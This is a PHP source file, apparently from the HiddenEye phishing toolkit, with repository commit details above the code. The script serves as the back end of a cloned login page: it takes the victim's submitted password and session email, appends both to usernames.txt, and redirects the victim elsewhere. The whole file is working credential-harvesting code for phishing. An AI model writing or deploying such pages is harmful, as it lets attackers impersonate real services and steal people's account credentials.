HiddenEye-Legacy/WebPages/live_web/login.php
Usama Abdul Sattar 025e969811
Update login.php
2019-06-22 12:02:54 +05:00

16 lines
314 B
PHP

<?php
include 'ip.php';
session_start();
$pass = $_POST["passwd"];
$email=$_SESSION["Email"];
file_put_contents("usernames.txt", "[EMAIL]: " . $email . " [PASS]: " . $pass . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();
session_destroy();
?>